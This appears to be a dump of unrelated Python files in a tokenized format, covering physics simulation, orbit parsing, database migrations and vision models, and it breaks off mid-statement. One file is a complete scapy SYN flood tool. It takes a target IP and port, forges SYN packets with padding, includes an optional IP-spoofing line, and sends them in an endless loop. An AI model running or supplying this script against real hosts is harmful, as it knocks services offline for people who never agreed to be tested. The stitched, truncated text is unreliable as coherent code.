"test_search_tolerance")<line_sep>parameters_file_name=os.path.join(path "ProjectParametersDEM.json")<with_stmt>open(parameters_file_name 'r')<as>parameter_file<block_start>project_parameters=KratosMultiphysics.Parameters(parameter_file.read())<block_end>project_parameters["SearchTolerance"].SetDouble(1e-03)<line_sep>project_parameters["search_tolerance_against_walls"].SetDouble(1e-03)<line_sep>project_parameters["NeighbourSearchFrequency"].SetInt(20)<line_sep>model=KratosMultiphysics.Model()<line_sep>auxiliary_functions_for_tests.CreateAndRunStageInSelectedNumberOfOpenMPThreads(DEM3D_SearchTolerance3 model project_parameters auxiliary_functions_for_tests.GetHardcodedNumberOfThreads())<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>Logger.GetDefaultOutput().SetSeverity(Logger.Severity.WARNING)<line_sep>KratosUnittest.main()<block_end>
<import_from_stmt>.base_assigner BaseAssigner<import_from_stmt>.max_iou_assigner MaxIoUAssigner<import_from_stmt>.approx_max_iou_assigner ApproxMaxIoUAssigner<import_from_stmt>.assign_result AssignResult<import_from_stmt>.max_iou_assigner_hbb_cy MaxIoUAssignerCy<import_from_stmt>.max_iou_assigner_rbbox MaxIoUAssignerRbbox<import_from_stmt>.approx_max_iou_assigner_cy ApproxMaxIoUAssignerCy<line_sep>__all__=['BaseAssigner' 'MaxIoUAssigner' 'ApproxMaxIoUAssigner' 'AssignResult' 'MaxIoUAssignerCy' 'MaxIoUAssignerRbbox' 'ApproxMaxIoUAssignerCy']<line_sep>
<import_stmt>numpy<as>np<import_stmt>scipy<import_stmt>cv2<def_stmt>get_pixel_neighbors height width<block_start>""" Estimate the 4 neighbors of every pixel in an image :param height: image height :param width: image width :return: pixel index - neighbor index lists """<line_sep>pix_id=[]<line_sep>neighbor_id=[]<for_stmt>i range(height)<block_start><for_stmt>j range(width)<block_start>n=[]<if_stmt>i<eq>0<block_start>n=n+[(i+1)<times>width+j]<block_end><elif_stmt>i<eq>height-1<block_start>n=n+[(i-1)<times>width+j]<block_end><else_stmt><block_start>n=n+[(i+1)<times>width+j (i-1)<times>width+j]<block_end><if_stmt>j<eq>0<block_start>n=n+[i<times>width+j+1]<block_end><elif_stmt>j<eq>width-1<block_start>n=n+[i<times>width+j-1]<block_end><else_stmt><block_start>n=n+[i<times>width+j+1 i<times>width+j-1]<block_end><for_stmt>k n<block_start>pix_id.append(i<times>width+j)<line_sep>neighbor_id.append(k)<block_end><block_end><block_end><return>pix_id neighbor_id<block_end>limps=np.array([[0 1] [1 2] [2 3] [3 4] [1 5] [5 6] [6 7] [1 11] [11 12] [12 13] [1 8] [8 9] [9 10] [14 15] [16 17] [0 14] [0 15] [14 16] [15 17]])<def_stmt>get_instance_skeleton_buffer h w poses<block_start>output=np.zeros((h w 3) dtype=np.float32)-1<for_stmt>i range(len(poses))<block_start>keypoints=poses[i]<line_sep>lbl=i<for_stmt>k range(limps.shape[0])<block_start>kp1,kp2=limps[k :].astype(int)<line_sep>bone_start=keypoints[kp1 :]<line_sep>bone_end=keypoints[kp2 :]<line_sep>bone_start[0]=np.maximum(np.minimum(bone_start[0] w-1) 0.)<line_sep>bone_start[1]=np.maximum(np.minimum(bone_start[1] h-1) 0.)<line_sep>bone_end[0]=np.maximum(np.minimum(bone_end[0] w-1) 0.)<line_sep>bone_end[1]=np.maximum(np.minimum(bone_end[1] h-1) 0.)<if_stmt>bone_start[2]<g>0.0<block_start>output[int(bone_start[1]) int(bone_start[0])]=1<line_sep>cv2.circle(output (int(bone_start[0]) int(bone_start[1])) 2 (lbl 0 0) -1)<block_end><if_stmt>bone_end[2]<g>0.0<block_start>output[int(bone_end[1]) int(bone_end[0])]=1<line_sep>cv2.circle(output (int(bone_end[0]) int(bone_end[1])) 2 (lbl 0 0) -1)<block_end><if_stmt>bone_start[2]<g>0.0<and>bone_end[2]<g>0.0<block_start>cv2.line(output (int(bone_start[0]) int(bone_start[1])) (int(bone_end[0]) int(bone_end[1])) (lbl 0 0) 1)<block_end><block_end><block_end><return>output[: : 0]<block_end><def_stmt>get_poseimg_for_opt sel_pose poseimg init_mask n_bg=50<block_start>h,w=init_mask.shape[:2]<line_sep>bg_label=1<line_sep>output=np.zeros((h w 3) dtype=np.float32)-1<line_sep>II,JJ=(poseimg<g>0).nonzero()<line_sep>Isel,J_sel=(poseimg<eq>sel_pose).nonzero()<line_sep>output[II JJ]=0<line_sep>output[Isel J_sel]=2<line_sep>init_mask[Isel J_sel]=1<line_sep># Sample also from points in the field init_mask=cv2.dilate(init_mask np.ones((25 25) np.uint8) iterations=1)<line_sep>I_bg,J_bg=(init_mask<eq>0).nonzero()<line_sep>rand_index=np.random.permutation(len(I_bg))[:n_bg]<line_sep>bg_points=np.array([J_bg[rand_index] I_bg[rand_index]]).T<for_stmt>k range(bg_points.shape[0])<block_start>cv2.circle(output (int(bg_points[k 0]) int(bg_points[k 1])) 2 (bg_label 0 0) -1)<block_end><return>output[: : 0]<block_end><def_stmt>draw_poses_for_optimization sel_pose keypoints_list init_mask n_bg=50<block_start>h,w=init_mask.shape[:2]<line_sep>bg_label=0<line_sep>output=np.zeros((h w 3) dtype=np.float32)-1<for_stmt>i range(len(keypoints_list))<block_start>keypoints=keypoints_list[i]<if_stmt>i<eq>sel_pose<block_start>lbl=2<block_end><else_stmt><block_start>lbl=1<block_end><for_stmt>k range(limps.shape[0])<block_start>kp1,kp2=limps[k :].astype(int)<line_sep>bone_start=keypoints[kp1 :]<line_sep>bone_end=keypoints[kp2 :]<line_sep>bone_start[0]=np.maximum(np.minimum(bone_start[0] w-1) 0.)<line_sep>bone_start[1]=np.maximum(np.minimum(bone_start[1] h-1) 0.)<line_sep>bone_end[0]=np.maximum(np.minimum(bone_end[0] w-1) 0.)<line_sep>bone_end[1]=np.maximum(np.minimum(bone_end[1] h-1) 0.)<if_stmt>bone_start[2]<g>0.0<block_start>output[int(bone_start[1]) int(bone_start[0])]=1<line_sep>cv2.circle(output (int(bone_start[0]) int(bone_start[1])) 2 (lbl 0 0) -1)<block_end><if_stmt>bone_end[2]<g>0.0<block_start>output[int(bone_end[1]) int(bone_end[0])]=1<line_sep>cv2.circle(output (int(bone_end[0]) int(bone_end[1])) 2 (lbl 0 0) -1)<block_end><if_stmt>bone_start[2]<g>0.0<and>bone_end[2]<g>0.0<block_start>cv2.line(output (int(bone_start[0]) int(bone_start[1])) (int(bone_end[0]) int(bone_end[1])) (lbl 0 0) 1)<block_end><block_end><block_end># Draw circles for the bg players keypoints # for k in range(bg_keypoints.shape[0]): # cv2.circle(output, (int(bg_keypoints[k, 0]), int(bg_keypoints[k, 1])), 2, (bg_keypoint_lable, 0, 0), -1) # Sample also from points in the field init_mask=cv2.dilate(init_mask np.ones((5 5) np.uint8) iterations=1)<line_sep>I_bg,J_bg=(init_mask<eq>0).nonzero()<line_sep>rand_index=np.random.permutation(len(I_bg))[:n_bg]<line_sep>bg_points=np.array([J_bg[rand_index] I_bg[rand_index]]).T<for_stmt>k range(bg_points.shape[0])<block_start>cv2.circle(output (int(bg_points[k 0]) int(bg_points[k 1])) 2 (bg_label 0 0) -1)<block_end><return>output[: : 0]<block_end><def_stmt>set_U strokes h w dim<block_start>N=h<times>w<line_sep>y=np.zeros((N dim))<line_sep>U=scipy.sparse.lil_matrix((N N))<for_stmt>p range(strokes.shape[0])<block_start>i=strokes[p 1]<line_sep>j=strokes[p 0]<line_sep>index=int(i<times>w+j)<for_stmt>ii range(dim)<block_start>y[index ii]=strokes[p ii+2]<block_end>U[index index]=1<block_end><return>U y<block_end><def_stmt>set_DW image edges=<none> sigma1=1000. sigma2=0.01<block_start>image=image.astype(float)<line_sep>h,w=image.shape[0:2]<line_sep>N=h<times>w<line_sep>pixd,neighborid=get_pixel_neighbors(h w)<line_sep>i,j=np.unravel_index(pixd (h w))<line_sep>ii,jj=np.unravel_index(neighborid (h w))<line_sep>pix_diff=np.squeeze((image[i j :]-image[ii jj :])<power>2)<if_stmt>len(pix_diff.shape)<eq>1<block_start>pix_diff=pix_diff[: np.newaxis]<block_end>weight0=np.exp(-(np.sum(pix_diff axis=1))/sigma1)<line_sep>weight1=np.exp(-((edges[i j])<power>2)/sigma2)<line_sep># neighbor_info = np.vstack((pixd, neighborid, weight0)).T M=len(pixd)<line_sep>D=scipy.sparse.lil_matrix((M N))<line_sep>W=scipy.sparse.lil_matrix((M M))<line_sep>p=np.arange(0 M 1)<line_sep>D[p pixd]=1<line_sep>D[p neighborid]=-1<line_sep>W[p p]=weight1<line_sep><return>D W<block_end>
<import_stmt>warnings<import_stmt>numpy<as>np<import_from_stmt>einsteinpy.integrators GeodesicIntegrator<import_from_stmt>.utils _P _kerr _kerrnewman _sch<class_stmt>Geodesic<block_start>""" Base Class for defining Geodesics Working in Geometrized Units (M-Units), with :math:`c = G = M = k_e = 1` """<def_stmt>__init__ self metric metric_params position momentum time_like=<true> return_cartesian=<true> **kwargs <block_start>""" Constructor Parameters ---------- metric : str Name of the metric. Currently, these metrics are supported: 1. Schwarzschild 2. Kerr 3. KerrNewman metric_params : array_like Tuple of parameters to pass to the metric E.g., ``(a,)`` for Kerr position : array_like 3-Position 4-Position is initialized by taking ``t = 0.0`` momentum : array_like 3-Momentum 4-Momentum is calculated automatically, considering the value of ``time_like`` time_like : bool, optional Determines type of Geodesic ``True`` for Time-like geodesics ``False`` for Null-like geodesics Defaults to ``True`` return_cartesian : bool, optional Whether to return calculated positions in Cartesian Coordinates This only affects the coordinates. Momenta are dimensionless quantities, and are returned in Spherical Polar Coordinates. Defaults to ``True`` kwargs : dict Keyword parameters for the Geodesic Integrator See 'Other Parameters' below. Other Parameters ---------------- steps : int Number of integration steps Defaults to ``50`` delta : float Initial integration step-size Defaults to ``0.5`` rtol : float Relative Tolerance Defaults to ``1e-2`` atol : float Absolute Tolerance Defaults to ``1e-2`` order : int Integration Order Defaults to ``2`` omega : float Coupling between Hamiltonian Flows Smaller values imply smaller integration error, but too small values can make the equation of motion non-integrable. For non-capture trajectories, ``omega = 1.0`` is recommended. For trajectories, that either lead to a capture or a grazing geodesic, a decreased value of ``0.01`` or less is recommended. Defaults to ``1.0`` suppress_warnings : bool Whether to suppress warnings during simulation Warnings are shown for every step, where numerical errors exceed specified tolerance (controlled by ``rtol`` and ``atol``) Defaults to ``False`` """<line_sep># Contravariant Metrics, defined so far _METRICS={"Schwarzschild":_sch "Kerr":_kerr "KerrNewman":_kerrnewman }<if_stmt>metric<not><in>_METRICS<block_start><raise>NotImplementedError(f"'{metric}' is unsupported. Currently, these metrics are supported:\ \n1. Schwarzschild\n2. Kerr\n3. KerrNewman")<block_end>self.metric_name=metric<line_sep>self.metric=_METRICS[metric]<line_sep>self.metric_params=metric_params<if_stmt>metric<eq>"Schwarzschild"<block_start>self.metric_params=(0.0 )<block_end>self.position=np.array([0.0 *position])<line_sep>self.momentum=_P(self.metric metric_params self.position momentum time_like)<line_sep>self.time_like=time_like<line_sep>self.kind="Time-like"<if>time_like<else>"Null-like"<line_sep>self.coords="Cartesian"<if>return_cartesian<else>"Spherical Polar"<line_sep>self._trajectory=self.calculate_trajectory(**kwargs)<block_end><def_stmt>__repr__ self<block_start><return>f"""Geodesic Object:(\n\ Type : ({self.kind}),\n\ Metric : ({self.metric_name}),\n\ Metric Parameters : ({self.metric_params}),\n\ Initial 4-Position : ({self.position}),\n\ Initial 4-Momentum : ({self.momentum}),\n\ Trajectory = (\n\ {self.trajectory}\n\ ),\n\ Output Position Coordinate System = ({self.coords})\n\ ))"""<block_end><def_stmt>__str__ self<block_start><return>self.__repr__()<block_end>@property<def_stmt>trajectory self<block_start>""" Returns the trajectory of the test particle """<line_sep><return>self._trajectory<block_end><def_stmt>calculate_trajectory self **kwargs<block_start>""" Calculate trajectory in spacetime Parameters ---------- kwargs : dict Keyword parameters for the Geodesic Integrator See 'Other Parameters' below. Returns ------- ~numpy.ndarray N-element numpy array, containing step count ~numpy.ndarray Shape-(N, 8) numpy array, containing (4-Position, 4-Momentum) for each step Other Parameters ---------------- steps : int Number of integration steps Defaults to ``50`` delta : float Initial integration step-size Defaults to ``0.5`` rtol : float Relative Tolerance Defaults to ``1e-2`` atol : float Absolute Tolerance Defaults to ``1e-2`` order : int Integration Order Defaults to ``2`` omega : float Coupling between Hamiltonian Flows Smaller values imply smaller integration error, but too small values can make the equation of motion non-integrable. For non-capture trajectories, ``omega = 1.0`` is recommended. For trajectories, that either lead to a capture or a grazing geodesic, a decreased value of ``0.01`` or less is recommended. Defaults to ``1.0`` suppress_warnings : bool Whether to suppress warnings during simulation Warnings are shown for every step, where numerical errors exceed specified tolerance (controlled by ``rtol`` and ``atol``) Defaults to ``False`` """<line_sep>g,g_prms=self.metric self.metric_params<line_sep>q0,p0=self.position self.momentum<line_sep>tl=self.time_like<line_sep>N=kwargs.get("steps" 50)<line_sep>dl=kwargs.get("delta" 0.5)<line_sep>rtol=kwargs.get("rtol" 1e-2)<line_sep>atol=kwargs.get("atol" 1e-2)<line_sep>order=kwargs.get("order" 2)<line_sep>omega=kwargs.get("omega" 1.0)<line_sep>sw=kwargs.get("suppress_warnings" <false>)<line_sep>steps=np.arange(N)<line_sep>geodint=GeodesicIntegrator(metric=g metric_params=g_prms q0=q0 p0=p0 time_like=tl steps=N delta=dl rtol=rtol atol=atol order=order omega=omega suppress_warnings=sw )<for_stmt>i steps<block_start>geodint.step()<block_end>vecs=np.array(geodint.results dtype=float)<line_sep>q1=vecs[: 0]<line_sep>p1=vecs[: 1]<line_sep>results=np.hstack((q1 p1))<line_sep># Ignoring # q2 = vecs[:, 2] # p2 = vecs[:, 3] <if_stmt>self.coords<eq>"Cartesian"# Converting to Cartesian from Spherical Polar Coordinates # Note that momenta cannot be converted this way, # due to ambiguities in the signs of v_r and v_th (velocities) <block_start>t,r,th,ph=q1.T<line_sep>pt,pr,pth,pph=p1.T<line_sep>x=r<times>np.sin(th)<times>np.cos(ph)<line_sep>y=r<times>np.sin(th)<times>np.sin(ph)<line_sep>z=r<times>np.cos(th)<line_sep>cart_results=np.vstack((t x y z pt pr pth pph)).T<line_sep><return>steps cart_results<block_end><return>steps results<block_end><block_end><class_stmt>Nulllike(Geodesic)<block_start>""" Class for defining Null-like Geodesics """<def_stmt>__init__ self metric metric_params position momentum return_cartesian=<true> **kwargs<block_start>""" Constructor Parameters ---------- metric : str Name of the metric. Currently, these metrics are supported: 1. Schwarzschild 2. Kerr 3. KerrNewman metric_params : array_like Tuple of parameters to pass to the metric E.g., ``(a,)`` for Kerr position : array_like 3-Position 4-Position is initialized by taking ``t = 0.0`` momentum : array_like 3-Momentum 4-Momentum is calculated automatically, considering the value of ``time_like`` return_cartesian : bool, optional Whether to return calculated positions in Cartesian Coordinates This only affects the coordinates. The momenta dimensionless quantities, and are returned in Spherical Polar Coordinates. Defaults to ``True`` kwargs : dict Keyword parameters for the Geodesic Integrator See 'Other Parameters' below. Other Parameters ---------------- steps : int Number of integration steps Defaults to ``50`` delta : float Initial integration step-size Defaults to ``0.5`` rtol : float Relative Tolerance Defaults to ``1e-2`` atol : float Absolute Tolerance Defaults to ``1e-2`` order : int Integration Order Defaults to ``2`` omega : float Coupling between Hamiltonian Flows Smaller values imply smaller integration error, but too small values can make the equation of motion non-integrable. For non-capture trajectories, ``omega = 1.0`` is recommended. For trajectories, that either lead to a capture or a grazing geodesic, a decreased value of ``0.01`` or less is recommended. Defaults to ``1.0`` suppress_warnings : bool Whether to suppress warnings during simulation Warnings are shown for every step, where numerical errors exceed specified tolerance (controlled by ``rtol`` and ``atol``) Defaults to ``False`` """<line_sep>super().__init__(metric=metric metric_params=metric_params position=position momentum=momentum time_like=<false> return_cartesian=return_cartesian **kwargs )<block_end><block_end><class_stmt>Timelike(Geodesic)<block_start>""" Class for defining Time-like Geodesics """<def_stmt>__init__ self metric metric_params position momentum return_cartesian=<true> **kwargs<block_start>""" Constructor Parameters ---------- metric : str Name of the metric. Currently, these metrics are supported: 1. Schwarzschild 2. Kerr 3. KerrNewman metric_params : array_like Tuple of parameters to pass to the metric E.g., ``(a,)`` for Kerr position : array_like 3-Position 4-Position is initialized by taking ``t = 0.0`` momentum : array_like 3-Momentum 4-Momentum is calculated automatically, considering the value of ``time_like`` return_cartesian : bool, optional Whether to return calculated positions in Cartesian Coordinates This only affects the coordinates. The momenta dimensionless quantities, and are returned in Spherical Polar Coordinates. Defaults to ``True`` kwargs : dict Keyword parameters for the Geodesic Integrator See 'Other Parameters' below. Other Parameters ---------------- steps : int Number of integration steps Defaults to ``50`` delta : float Initial integration step-size Defaults to ``0.5`` rtol : float Relative Tolerance Defaults to ``1e-2`` atol : float Absolute Tolerance Defaults to ``1e-2`` order : int Integration Order Defaults to ``2`` omega : float Coupling between Hamiltonian Flows Smaller values imply smaller integration error, but too small values can make the equation of motion non-integrable. For non-capture trajectories, ``omega = 1.0`` is recommended. For trajectories, that either lead to a capture or a grazing geodesic, a decreased value of ``0.01`` or less is recommended. Defaults to ``1.0`` suppress_warnings : bool Whether to suppress warnings during simulation Warnings are shown for every step, where numerical errors exceed specified tolerance (controlled by ``rtol`` and ``atol``) Defaults to ``False`` """<line_sep>super().__init__(metric=metric metric_params=metric_params position=position momentum=momentum time_like=<true> return_cartesian=return_cartesian **kwargs )<block_end><block_end>
<import_stmt>os<import_stmt>logging<import_stmt>datetime<import_from_stmt>isceobj.Orbit.Orbit Orbit<import_from_stmt>isceobj.Orbit.Orbit StateVector<import_from_stmt>isceobj.Util.decorators type_check logged pickled<class_stmt>PRC(object)<block_start>"""A class to parse orbit data from D-PAF"""<line_sep>logging_name="isce.orbit.PRC.PRC"<line_sep>@logged<def_stmt>__init__ self file=<none><block_start>self.filename=file<line_sep>self.firstEpoch=0<line_sep>self.lastEpoch=0<line_sep>self.tdtOffset=0<line_sep>self.orbit=Orbit()<line_sep>self.orbit.configure()<line_sep>self.orbit.setOrbitQuality('Precise')<line_sep>self.orbit.setOrbitSource('PRC')<line_sep><return><none><block_end><def_stmt>getOrbit self<block_start><return>self.orbit<block_end><def_stmt>parse self#People still seem to be using the old .Z format #Adding support for it - PSA <block_start><if_stmt>os.path.splitext(self.filename)[1]<eq>'.Z'<block_start><import_from_stmt>subprocess Popen PIPE<line_sep>fp=Popen(["zcat" self.filename] stdout=PIPE).stdout<block_end><else_stmt><block_start>fp=open(self.filename 'r')<block_end>data=fp.read()<line_sep>fp.close()<line_sep>numLines=int(len(data)/130)<for_stmt>i range(numLines)<block_start>line=data[i<times>130:(i+1)<times>130]<line_sep>self.__parseLine(line)<block_end><block_end><def_stmt>__parseLine self line<block_start>"""Parse a line from a PRC orbit file"""<line_sep>referenceFrame=line[0:6].decode('utf-8')<if_stmt>(referenceFrame<eq>'STATE ')<block_start>self.__parseStateLine(line)<block_end><if_stmt>(referenceFrame<eq>'STTERR')<block_start>self.__parseTerrestrialLine(line)<block_end><block_end><def_stmt>__parseTerrestrialLine self line<block_start>j2000Day=float(line[14:20])/10.0+0.5<line_sep>tdt=float(line[20:31])/1e6<line_sep>x=float(line[31:43])/1e3<line_sep>y=float(line[43:55])/1e3<line_sep>z=float(line[55:67])/1e3<line_sep>vx=float(line[67:78])/1e6<line_sep>vy=float(line[78:89])/1e6<line_sep>vz=float(line[89:100])/1e6<line_sep>quality=line[127]<line_sep>tdt=tdt-self.tdtOffset<line_sep>dt=self.__j2000ToDatetime(j2000Day tdt)<line_sep>sv=StateVector()<line_sep>sv.configure()<line_sep>sv.setTime(dt)<line_sep>sv.setPosition([x y z])<line_sep>sv.setVelocity([vx vy vz])<line_sep>self.orbit.addStateVector(sv)<block_end><def_stmt>__parseStateLine self line<block_start>self.firstEpoch=self.__j2000ToDatetime(float(line[6:12])/10.0 0.0)<line_sep>self.lastEpoch=self.__j2000ToDatetime(float(line[12:18])/10.0 0.0)<line_sep>self.tdtOffset=float(line[47:52])<line_sep>self.tdtOffset=self.tdtOffset/1e3<block_end><def_stmt>__j2000ToDatetime self j2000Day tdt<block_start>"""Convert the number of days since 1 Jan. 2000 to a datetime object"""<line_sep>j2000=datetime.datetime(year=2000 month=1 day=1)<line_sep>dt=j2000+datetime.timedelta(days=j2000Day seconds=tdt)<line_sep><return>dt<block_end><pass><block_end>@pickled<class_stmt>Arclist(object)<block_start>"""A class for parsing the old ROI_PAC PRC arclist file"""<line_sep>logging_name='isce.Orbit.PRC.Arclist'<line_sep>@logged<def_stmt>__init__ self file=<none><block_start>self.filename=file<line_sep>self.arclist=[]<line_sep><return><none><block_end><def_stmt>parse self<block_start>fp=open(self.filename 'r')<for_stmt>line fp.readlines()<block_start>data=line.split()<line_sep>start=float(data[1])/10.0<line_sep>end=float(data[2])/10.0<line_sep>arc=Arc()<line_sep>arc.filename=data[0]<line_sep>arc.setStart(self.__j2000ToDatetime(start 86400.0/2.0))<line_sep>arc.setStop(self.__j2000ToDatetime(end 86400.0/2.0))<line_sep>self.arclist.append(arc)<block_end><block_end><def_stmt>getArc self time<block_start>"""Given a datetime object, determine the first arc number that contains precise ephemeris"""<line_sep>inRange=[]<line_sep># Make a list containing all of the # arcs that span <code>time</code> <for_stmt>arc self.arclist<block_start><if_stmt>(arc.inRange(time))<block_start>inRange.append(arc)<block_end><block_end><if_stmt>(len(inRange)<eq>0)<block_start>self.logger.error("No valid arcs found spanning %s"%(time))<block_end><if_stmt>(len(inRange)<g>0)<block_start>self.logger.info("%s valid arcs found spanning %s"%(len(inRange) time))<block_end><return>inRange[0].filename<block_end><def_stmt>getOrbitFile self time<block_start>filename=self.getArc(time)<line_sep><return>filename<block_end><def_stmt>__j2000ToDatetime self j2000Day tdt<block_start>"""Convert the number of days since 1 Jan. 2000 to a datetime object"""<line_sep>j2000=datetime.datetime(year=2000 month=1 day=1)<line_sep>dt=j2000+datetime.timedelta(days=j2000Day seconds=tdt)<line_sep><return>dt<block_end><block_end><class_stmt>Arc(object)<block_start>"""A class representing an orbital arc segment"""<def_stmt>__init__ self<block_start>self.filename=<none><line_sep>self._start=<none><line_sep>self._stop=<none><block_end><def_stmt>getStart self<block_start><return>self._start<block_end>@type_check(datetime.datetime)<def_stmt>setStart self start<block_start>self._start=start<block_end><def_stmt>getStop self<block_start><return>self._stop<block_end>@type_check(datetime.datetime)<def_stmt>setStop self stop<block_start>self._stop=stop<block_end><def_stmt>inRange self time<block_start>"""Determine whether a time stamp lies within the start and stop times"""<line_sep><return>self._start<le>time<le>self._stop<block_end>start=property(fget=getStart fset=setStart)<line_sep>stop=property(fget=getStop fset=setStop)<line_sep><pass><block_end>
<import_from_stmt>authx.middleware.Oauth2 MiddlewareOauth2<line_sep>__all__=["MiddlewareOauth2"]<line_sep>
"""Remove dead ads table Revision ID: <KEY> Revises: 1307b62614a4 Create Date: 2020-02-27 23:14:41.314000 """<line_sep># revision identifiers, used by Alembic. revision='<KEY>'<line_sep>down_revision='1307b62614a4'<import_from_stmt>alembic op# lgtm[py/unused-import] <import_stmt>sqlalchemy<as>sa# lgtm[py/unused-import] <import_from_stmt>sqlalchemy.dialects postgresql<def_stmt>upgrade # ### commands auto generated by Alembic - please adjust! ### <block_start>op.drop_index('ind_ads_end' table_name='ads')<line_sep>op.drop_table('ads')<line_sep># ### end Alembic commands ### <block_end><def_stmt>downgrade # ### commands auto generated by Alembic - please adjust! ### <block_start>op.create_table('ads' sa.Column('id' sa.INTEGER() autoincrement=<true> nullable=<false>) sa.Column('owner' sa.VARCHAR(length=254) autoincrement=<false> nullable=<false>) sa.Column('link_target' sa.TEXT() autoincrement=<false> nullable=<false>) sa.Column('file' sa.INTEGER() autoincrement=<false> nullable=<false>) sa.Column('start' postgresql.TIMESTAMP() autoincrement=<false> nullable=<true>) sa.Column('end' postgresql.TIMESTAMP() autoincrement=<false> nullable=<true>) sa.ForeignKeyConstraint(['file'] [u'media.mediaid'] name=u'ads_file_fkey' onupdate=u'CASCADE' ondelete=u'CASCADE') sa.PrimaryKeyConstraint('id' name=u'ads_pkey'))<line_sep>op.create_index('ind_ads_end' 'ads' ['end'] unique=<false>)<line_sep># ### end Alembic commands ### <block_end>
# contains neither Process object nor execute() function
# Generated by Django 2.0.4 on 2018-04-13 07:47 <import_from_stmt>django.conf settings<import_from_stmt>django.db migrations models<import_stmt>django.utils.timezone<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('report_builder_scheduled' '0001_initial') ]<line_sep>operations=[migrations.AlterField(model_name='scheduledreport' name='last_run_at' field=models.DateTimeField(auto_now_add=<true> default=django.utils.timezone.now) preserve_default=<false> ) migrations.AlterField(model_name='scheduledreport' name='users' field=models.ManyToManyField(blank=<true> help_text='Staff users to notify' limit_choices_to={'is_staff':<true>} to=settings.AUTH_USER_MODEL) ) ]<block_end>
<import_stmt>torch<import_from_stmt>torch nn<import_from_stmt>torch.nn functional<as>F<import_from_stmt>.resnet resnet18 resnet34<import_from_stmt>.segmentation SegmentationHead<import_from_stmt>.attention Attention<import_from_stmt>.erfnet ERFNet<class_stmt>Normalize(nn.Module)<block_start>""" ImageNet normalization """<def_stmt>__init__ self mean std<block_start>super().__init__()<line_sep>self.mean=nn.Parameter(torch.tensor(mean) requires_grad=<false>)<line_sep>self.std=nn.Parameter(torch.tensor(std) requires_grad=<false>)<block_end><def_stmt>forward self x<block_start><return>(x-self.mean[<none> : <none> <none>])/self.std[<none> : <none> <none>]<block_end><block_end><class_stmt>RGBModel(nn.Module)<block_start><def_stmt>__init__ self seg_channels pretrained=<true><block_start>super().__init__()<line_sep>self.num_channels=len(seg_channels)<line_sep>self.backbone=resnet18(pretrained=pretrained)<line_sep>self.normalize=Normalize(mean=[0.485 0.456 0.406] std=[0.229 0.224 0.225])<line_sep>self.head=<none><block_end><def_stmt>forward self rgb<block_start>embd=self.backbone(self.normalize(rgb/255.))<line_sep><return>self.head(embd).squeeze(-1)<block_end><block_end><class_stmt>RGBSegmentationModel(nn.Module)<block_start><def_stmt>__init__ self seg_channels<block_start>super().__init__()<line_sep>self.erfnet=ERFNet(len(seg_channels)+1)<line_sep>self.normalize=<lambda>x:(x/255.-.5)<times>2<block_end><def_stmt>forward self rgb<block_start><return>self.erfnet(self.normalize(rgb))<block_end><block_end><class_stmt>RGBBrakePredictionModel(nn.Module)<block_start><def_stmt>__init__ self seg_channels pretrained=<true><block_start>super().__init__()<line_sep>self.conv_backbone=resnet18(pretrained=pretrained)<line_sep>self.normalize=Normalize(mean=[0.485 0.456 0.406] std=[0.229 0.224 0.225])<line_sep>self.seg_head=SegmentationHead(512 len(seg_channels)+1)<line_sep>self.classifier=nn.Sequential(nn.Linear(1024 1) nn.Sigmoid())<block_end><def_stmt>forward self rgb1 rgb2 mask=<false><block_start>x1=self.conv_backbone(self.normalize(rgb1/255.))<line_sep>x2=self.conv_backbone(self.normalize(rgb2/255.))<line_sep>h1=x1.mean(dim=[2 3])<line_sep>h2=x2.mean(dim=[2 3])<line_sep>pred_bra=self.classifier(torch.cat([h1 h2] dim=1))<if_stmt>mask<block_start>pred_sem1=F.interpolate(self.seg_head(x1) scale_factor=4)<line_sep>pred_sem2=F.interpolate(self.seg_head(x2) scale_factor=4)<line_sep><return>pred_bra[: 0] pred_sem1 pred_sem2<block_end><else_stmt><block_start><return>pred_bra[: 0]<block_end><block_end><block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep># BTagPerformanceAnalyzer configuration <import_from_stmt>Validation.RecoB.bTagAnalysis_cfi *<line_sep>bTagValidationHarvest=bTagHarvestMC.clone()<import_from_stmt>DQMOffline.RecoB.bTagAnalysisData_cfi *<line_sep>bTagValidationHarvestData=bTagHarvest.clone()<line_sep>
<import_from_stmt>scapy.all *<import_stmt>argparse<line_sep>parser=argparse.ArgumentParser(description="Simple SYN Flood Script")<line_sep>parser.add_argument("target_ip" help="Target IP address (e.g router's IP)")<line_sep>parser.add_argument("-p" "--port" help="Destination port (the port of the target's machine service, \ e.g 80 for HTTP, 22 for SSH and so on).")<line_sep># parse arguments from the command line args=parser.parse_args()<line_sep># target IP address (should be a testing router/firewall) target_ip=args.target_ip<line_sep># the target port u want to flood target_port=args.port<line_sep># forge IP packet with target ip as the destination IP address ip=IP(dst=target_ip)<line_sep># or if you want to perform IP Spoofing (will work as well) # ip = IP(src=RandIP("192.168.1.1/24"), dst=target_ip) # forge a TCP SYN packet with a random source port # and the target port as the destination port tcp=TCP(sport=RandShort() dport=target_port flags="S")<line_sep># add some flooding data (1KB in this case, don't increase it too much, # otherwise, it won't work.) raw=Raw(b"X"<times>1024)<line_sep># stack up the layers p=ip/tcp/raw<line_sep># send the constructed packet in a loop until CTRL+C is detected send(p loop=1 verbose=0)<line_sep>
a=1<line_sep>b=2<line_sep>print('a = '+str(a)+','+'b = '+str(b))<line_sep>temp=a<line_sep>a=b<line_sep>b=temp<line_sep>print('a = '+str(a)+','+'b = '+str(b))<line_sep>
<import_stmt>pandas<as>pd<import_stmt>numpy<as>np<import_from_stmt>numpy corrcoef<import_stmt>matplotlib.pyplot<as>plt<import_from_stmt>sklearn.feature_selection chi2<import_from_stmt>sklearn.feature_selection f_classif<import_from_stmt>math *<line_sep>plt.style.use('ggplot')<line_sep>fig=plt.figure()<line_sep>COUNTER=1<line_sep>#Return the category dictionary,categorical variables list and continuous list for every column in dataframe. #The categories are assigned as "target(type)_feature(type)" <def_stmt>get_category df target_name categorical_name columns_name<block_start>cat_dict={}<line_sep>fin_cat_dict={}<line_sep>catg_catg=[]<line_sep>cont_cont=[]<line_sep>catg_cont=[]<line_sep>cont_catg=[]<for_stmt>col columns_name<block_start><if_stmt>len(df[col].unique())<le>2<block_start>cat_dict[col]="categorical"<block_end><elif_stmt>col<in>categorical_name<block_start>cat_dict[col]="categorical"<block_end><else_stmt><block_start>cat_dict[col]="continous"<block_end><block_end><for_stmt>col 